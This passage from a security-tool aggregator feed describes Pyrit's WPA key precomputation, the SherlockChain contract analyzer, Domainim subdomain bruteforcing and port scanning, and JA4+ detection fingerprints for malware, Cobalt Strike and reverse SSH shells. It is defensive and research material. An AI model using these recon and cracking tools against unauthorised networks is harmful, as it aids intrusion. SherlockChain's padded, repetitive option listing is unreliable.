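With the widely published IEEE 802.11i test vector (passphrase "password", SSID "IEEE"), the resulting PMK begins with `f42c6fc5`. Because the salt is the SSID, one pre-computed database only covers networks sharing that SSID, which is why Pyrit batches PMKs per ESSID.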

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC interface and provides three computational nodes, two of which actually access the RPC interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue at https://github.com/JPaulMora/Pyrit/issues.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R β€” May 27th 2024 at 12:30


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses.

    The --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    5. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

    6. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    7. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    8. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    9. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    10. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
    [--filter-check-upgradeable] [--filter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
    [--report-severity REPORT_SEVERITY] [--report-impact REPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
    [--report-all-options] [--report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
    [--ai-models-config-version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

    AI-Powered Detectors

    Num Detector What it Detects Impact Confidence
    1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
    2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
    3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
    4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
    5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
    Detectors
    Num Detector What it Detects Impact Confidence
    1 abiencoderv2-array Storage abiencoderv2 array High High
    2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
    3 array-by-reference Modifying storage array by value High High
    4 encode-packed-collision ABI encodePacked Collision High High
    5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
    6 multiple-constructors Multiple constructor schemes High High
    7 name-reused Contract's name reused High High
    8 protected-vars Detected unprotected variables High High
    9 public-mappings-nested Public mappings with nested variables High High
    10 rtlo Right-To-Left-Override control character is used High High
    11 shadowing-state State variables shadowing High High
    12 suicidal Functions allowing anyone to destruct the contract High High
    13 uninitialized-state Uninitialized state variables High High
    14 uninitialized-storage Uninitialized storage variables High High
    15 unprotected-upgrade Unprotected upgradeable contract High High
    16 codex Use Codex to find vulnerabilities. High Low
    17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
    18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
    19 controlled-array-length Tainted array length assignment High Medium
    20 controlled-delegatecall Controlled delegatecall destination High Medium
    21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
    22 incorrect-exp Incorrect exponentiation High Medium
    23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
    24 msg-value-loop msg.value inside a loop High Medium
    25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
    26 return-leave If a return is used instead of a leave. High Medium
    27 storage-array Signed storage integer array compiler bug High Medium
    28 unchecked-transfer Unchecked tokens transfer High Medium
    29 weak-prng Weak PRNG High Medium
    30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
    31 enum-conversion Detect dangerous enum conversion Medium High
    32 erc20-interface Incorrect ERC20 interfaces Medium High
    33 erc721-interface Incorrect ERC721 interfaces Medium High
    34 incorrect-equality Dangerous strict equalities Medium High
    35 locked-ether Contracts that lock ether Medium High
    36 mapping-deletion Deletion on mapping containing a structure Medium High
    37 shadowing-abstract State variables shadowing from abstract contracts Medium High
    38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
    39 tautology Tautology or contradiction Medium High
    40 write-after-write Unused write Medium High
    41 boolean-cst Misuse of Boolean constant Medium Medium
    42 constant-function-asm Constant functions using assembly code Medium Medium
    43 constant-function-state Constant functions changing the state Medium Medium
    44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
    45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
    46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
    47 reused-constructor Reused base constructor Medium Medium
    48 tx-origin Dangerous usage of tx.origin Medium Medium
    49 unchecked-lowlevel Unchecked low-level calls Medium Medium
    50 unchecked-send Unchecked send Medium Medium
    51 uninitialized-local Uninitialized local variables Medium Medium
    52 unused-return Unused return values Medium Medium
    53 incorrect-modifier Modifiers that can return the default value Low High
    54 shadowing-builtin Built-in symbol shadowing Low High
    55 shadowing-local Local variables shadowing Low High
    56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
    57 variable-scope Local variables used prior their declaration Low High
    58 void-cst Constructor called not implemented Low High
    59 calls-loop Multiple calls in a loop Low Medium
    60 events-access Missing Events Access Control Low Medium
    61 events-maths Missing Events Arithmetic Low Medium
    62 incorrect-unary Dangerous unary expressions Low Medium
    63 missing-zero-check Missing Zero Address Validation Low Medium
    64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
    65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
    66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
    67 timestamp Dangerous usage of block.timestamp Low Medium
    68 assembly Assembly usage Informational High
    69 assert-state-change Assert state change Informational High
    70 boolean-equal Comparison to boolean constant Informational High
    71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
    72 deprecated-standards Deprecated Solidity Standards Informational High
    73 erc20-indexed Un-indexed ERC20 event parameters Informational High
    74 function-init-state Function initializing state variables Informational High
    75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
    76 low-level-calls Low level calls Informational High
    77 missing-inheritance Missing inheritance Informational High
    78 naming-convention Conformity to Solidity naming conventions Informational High
    79 pragma If different pragma directives are used Informational High
    80 redundant-statements Redundant statements Informational High
    81 solc-version Incorrect Solidity version Informational High
    82 unimplemented-functions Unimplemented functions Informational High
    83 unused-import Detects unused imports Informational High
    84 unused-state Unused state variables Informational High
    85 costly-loop Costly operations in a loop Informational Medium
    86 dead-code Functions that are not used Informational Medium
    87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
    88 similar-names Variable names are too similar Informational Medium
    89 too-many-digits Conformance to numeric notation best practices Informational Medium
    90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
    91 constable-states State variables that could be declared constant Optimization High
    92 external-function Public function that could be declared external Optimization High
    93 immutable-states State variables that could be declared immutable Optimization High
    94 var-read-using-this Contract reads its own variable using this Optimization High


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

    By: Zion3R β€” May 26th 2024 at 12:30


    Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


    Features

    Current features (v1.0.1):

    • Subdomain enumeration (2 engines + bruteforcing)
    • User-friendly output
    • Resolving A records (IPv4)
    • Virtual hostname enumeration
    • Reverse DNS lookup
    • Detects wildcard subdomains (for bruteforcing)
    • Basic TCP port scanning
    • Subdomains are accepted as input
    • Export results to JSON file

    A few features are work in progress. See Planned features for more details.

    The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

    Installation

    You can build this repo from source:

    • Clone the repository

    git clone git@github.com:pptx704/domainim
    • Build the binary
    nimble build
    • Run the binary
    ./domainim <domain> [--ports=<ports>]

    Or, you can just download the binary from the release page. Keep in mind that the binary has been tested on Debian-based systems only.

    Usage

    ./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    • <domain> is the domain to be enumerated. It can be a subdomain as well.
    • --ports | -p is a string specification of the ports to be scanned. It can be one of the following-
    • all - Scan all ports (1-65535)
    • none - Skip port scanning (default)
    • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
    • single value - Scan a single port. i.e. 80 scans port 80
    • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
    • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
    • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
    • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
    • a.b.c.d - Use DNS server at a.b.c.d on port 53
    • a.b.c.d#n - Use DNS server at a.b.c.d on port n
    • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
    • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. Note that DNS queries are made in batches, and the next batch starts only after the previous one completes. Since queries can be rate-limited, increasing this value does not always guarantee faster results.
    • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

    Examples:
    β€’ ./domainim nmap.org --ports=all
    β€’ ./domainim google.com --ports=none --dns=8.8.8.8#53
    β€’ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
    β€’ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --out=results.json
    β€’ ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

    The help menu can be accessed using ./domainim --help or ./domainim -h.

    Usage:
    domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    domainim (-h | --help)

    Options:
    -h, --help Show this screen.
    -p, --ports Ports to scan. [default: `none`]
    Can be `all`, `none`, `t<n>`, single value, range value, combination
    -l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
    -d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
    -r, --rps DNS queries to be made per second [default: 1024 req/s]
    -o, --out JSON file where the output will be saved. Filename must end with `.json`

    Examples:
    domainim domainim.com -p:t500 -l:wordlist.txt -d:1.1.1.1#53 --out=results.json
    domainim sub.domainim.com --ports=all --dns=8.8.8.8 -r:1500 -o:results.json

    The JSON schema for the results is as follows-

    [
        {
            "subdomain": string,
            "data": [
                {
                    "ipv4": string,
                    "vhosts": [string],
                    "reverse_dns": string,
                    "ports": [int]
                }
            ]
        }
    ]

    Example json for nmap.org can be found here.
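As a quick sanity check of the schema above, a consumer can load the output file and collapse each subdomain's entries into the set of open ports. This is a hypothetical post-processing snippet (the `sample` data is fabricated for illustration), not part of domainim.

```python
import json

# Fabricated sample matching the JSON schema above.
sample = json.loads("""
[
  {"subdomain": "ack.nmap.org",
   "data": [{"ipv4": "45.33.49.119",
             "vhosts": ["nmap.org", "svn.nmap.org"],
             "reverse_dns": "ack.nmap.org.",
             "ports": [22, 80, 443]}]}
]
""")

def open_ports(results):
    """Map each subdomain to the union of ports across all of its IPs."""
    return {r["subdomain"]: sorted({p for d in r["data"] for p in d["ports"]})
            for r in results}
```

Running `open_ports(sample)` yields `{"ack.nmap.org": [22, 80, 443]}`.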

    Contributing

    Contributions are welcome. Feel free to open a pull request or an issue.

    Planned Features

    • [x] TCP port scanning
    • [ ] UDP port scanning support
    • [ ] Resolve AAAA records (IPv6)
    • [x] Custom DNS server
    • [x] Add bruteforcing subdomains using a wordlist
    • [ ] Force bruteforcing (even if wildcard subdomain is found)
    • [ ] Add more engines for subdomain enumeration
    • [x] File output (JSON)
    • [ ] Multiple domain enumeration
    • [ ] Dir and File busting

    Others

    • [x] Update verbose output when encountering errors (v0.2.0)
    • [x] Show progress bar for longer operations
    • [ ] Add individual port scan progress bar
    • [ ] Add tests
    • [ ] Add comments and docstrings

    Additional Notes

    This project is still in its early stages. There are several limitations I am aware of.

    The two engines I am using (I'm calling them engines because Sublist3r does so) currently have some sort of response limit. dnsdumpster can fetch up to 100 subdomains. crt.sh also randomizes the results when there are too many. Another issue with crt.sh is that it sometimes returns an SQL error. So for some domains, results can differ between runs. I am planning to add more engines in the future (at least a brute-force engine).

    The port scanner only waits ping response time + 750ms before timing out. This might lead to false negatives. Since domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

    It might seem that the way vhostnames are printed just introduces repetition.


    Printing them as follows might've been better-

    ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
    ↳ 45.33.49.119
    ↳ Reverse DNS: ack.nmap.org.

    But while testing earlier, I found cases where not all IPs are shared by the same set of vhostnames. That is why I decided to keep it this way.


    The DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This spreads the queries out instead of hitting the DNS server with everything at once. For the bruteforcing method, the value is between 0-1000ms by default, but that can be changed using the --rps | -r flag.
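The jitter idea described above is simple to sketch: draw a small random delay per query so requests arrive spread out rather than in a burst. This is an illustrative stand-in (the function name and parameters are hypothetical), not domainim's actual Nim code.

```python
import random

def jitter_delay(spread_ms: int = 300) -> float:
    """Random per-query delay in seconds (0-300ms by default), spreading
    DNS queries out instead of sending them all at once."""
    return random.uniform(0, spread_ms) / 1000.0
```

A caller would `time.sleep(jitter_delay())` before each resolution; for bruteforcing, the same sketch with `spread_ms=1000` matches the 0-1000ms default mentioned above.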

    One particular limitation that is bugging me is that the DNS resolver does not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs a domain has. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records, so if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author on this.

    For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing would resolve an IPv4 for every candidate subdomain. However, this also skips valid subdomains (i.e. scanme.nmap.org would be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.
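A common way to detect such a wildcard, which the behavior above implies, is to resolve a random label that almost certainly does not exist: if it resolves anyway, the zone likely has a wildcard record. The sketch below is hypothetical (the `resolve` callback is injected so it can be any resolver), not domainim's implementation.

```python
import secrets

def has_wildcard(domain: str, resolve) -> bool:
    """Heuristic wildcard check: if a random, almost certainly nonexistent
    label resolves, the zone likely has a wildcard record, and bruteforcing
    would return a false positive for every candidate subdomain."""
    probe = f"{secrets.token_hex(8)}.{domain}"   # e.g. 16 random hex chars
    return resolve(probe) is not None
```

With a real resolver callback (e.g. wrapping `socket.gethostbyname` and returning `None` on failure), a `True` result is the signal to skip or force bruteforcing.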

    The same is true for vhost enumeration with subdomain inputs. Since only URLs that end with the given subdomain are returned, subdomains of sibling domains are not considered. For example, scanme.nmap.org will not be printed for ack.nmap.org, but something.ack.nmap.org might be. I could search for all subdomains of nmap.org, but that defeats the purpose of having a subdomain as an input.

    License

    MIT License. See LICENSE for full text.



    KitPloit - PenTest Tools!

    JA4+ - Suite Of Network Fingerprinting Standards

    By: Zion3R β€” May 25th 2024 at 12:30


    JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

    Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
    JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
    JA4T: TCP Fingerprinting (JA4T/TS/TScan)


    To understand how to read JA4+ fingerprints, see Technical Details

    This repo includes JA4+ implementations in Python, Rust, Zeek, and C (as a Wireshark plugin).

    JA4/JA4+ support is being added to:
    GreyNoise
    Hunt
    Driftnet
    DarkSail
    Arkime
    GoLang (JA4X)
    Suricata
    Wireshark
    Zeek
    nzyme
    Netresec's CapLoader
    Netresec's NetworkMiner
    NGINX
    F5 BIG-IP
    nfdump
    ntop's ntopng
    ntop's nDPI
    Team Cymru
    NetQuest
    Censys
    Exploit.org's Netryx
    Cloudflare
    fastly
    with more to be announced...

    Examples

    Application JA4+ Fingerprints
    Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
    JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
    JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
    JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
    IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
    IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
    JA4S=t120300_c030_5e2616a54c73
    Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
    JA4S=t130200_1301_a56c5b993250
    JA4X=000000000000_4f24da86fad6_bf0f0589fc03
    JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
    Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
    JA4X=2166164053c1_2166164053c1_30d204a01551
    SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
    JA4S=t130200_1302_a56c5b993250
    JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
    Qakbot JA4X=2bab15409345_af684594efb4_000000000000
    Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
    Darkgate JA4H=po10nn060000_cdb958d032b0
    LummaC2 JA4H=po11nn050000_d253db9d024b
    Evilginx JA4=t13d191000_9dc949149365_e7c285222651
    Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
    Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
    Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

    For more, see ja4plus-mapping.csv
    The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

    Plugins

    Wireshark
    Zeek
    Arkime

    Binaries

    Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

    Download the latest JA4 binaries from: Releases.

    JA4+ on Ubuntu

    sudo apt install tshark
    ./ja4 [options] [pcap]

    JA4+ on Mac

    1) Install Wireshark https://www.wireshark.org/download.html which will install tshark
    2) Add tshark to $PATH

    ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
    ./ja4 [options] [pcap]

    JA4+ on Windows

    1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
    tshark.exe is at the location where Wireshark is installed, for example: C:\Program Files\Wireshark\tshark.exe
    2) Add the location of tshark to your "PATH" environment variable in Windows.
    (System properties > Environment Variables... > Edit Path)
    3) Open cmd, navigate to the ja4 folder

    ja4 [options] [pcap]

    Database

    An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

    In the meantime, see ja4plus-mapping.csv

    Feel free to do a pull request with any JA4+ data you find.

    JA4+ Details

    JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

    All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

    For example, GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints, but with JA4, only the b part of the JA4 fingerprint changes; parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
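Because every JA4+ fingerprint uses the a_b_c format, deriving a JA4_ac value from a full fingerprint is a one-line string operation. This is an illustrative helper, not an official JA4+ tool:

```python
def ja4_ac(fp: str) -> str:
    """Join the a and c sections of an a_b_c JA4 fingerprint, dropping b,
    as in the GreyNoise tracking example above."""
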